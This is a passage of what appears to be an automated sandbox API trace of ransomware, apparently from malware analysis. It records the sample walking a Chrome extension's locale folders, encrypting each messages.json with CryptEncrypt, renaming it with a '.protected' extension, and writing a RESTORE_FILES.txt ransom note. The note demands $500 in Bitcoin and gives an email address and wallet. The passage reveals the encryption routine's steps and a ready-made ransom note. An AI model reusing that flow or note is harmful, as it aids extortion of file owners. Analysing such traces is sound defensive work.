Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected") returned 165 [0081.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.protected")) returned 1 [0081.424] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.424] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.424] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0081.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.425] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.425] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.426] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.426] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.426] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.426] CloseHandle (hObject=0x164) returned 1 [0081.426] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0081.426] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0081.426] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned 141 [0081.426] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0081.426] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0081.426] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*") returned 143 [0081.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\.") returned 143 [0081.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.427] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\..") returned 144 [0081.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.427] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.427] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.427] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json") returned 155 [0081.428] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.428] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x121, lpOverlapped=0x0) returned 1 [0081.429] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x121, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x121, lpOverlapped=0x0) returned 1 [0081.429] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.429] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.429] CloseHandle (hObject=0x168) returned 1 [0081.429] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected") returned 165 [0081.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0081.430] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.430] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.430] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0081.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.430] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.430] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.431] lstrlenA (lpString="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") returned 684 [0081.431] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.431] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.431] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.432] CloseHandle (hObject=0x164) returned 1 [0081.432] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned 141 [0081.432] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0081.432] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*") returned 143 [0081.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.432] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\.") returned 143 [0081.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.432] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.432] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.432] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\..") returned 144 [0081.432] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.433] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.433] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.433] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") 
returned 155 [0081.433] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.433] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json") returned 155 [0081.433] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.434] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0081.435] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0081.435] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.435] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.435] CloseHandle (hObject=0x168) returned 1 [0081.435] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected") returned 165 [0081.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json.protected")) returned 1 [0081.436] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.436] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.436] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\RESTORE_FILES.txt") returned 159 [0081.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 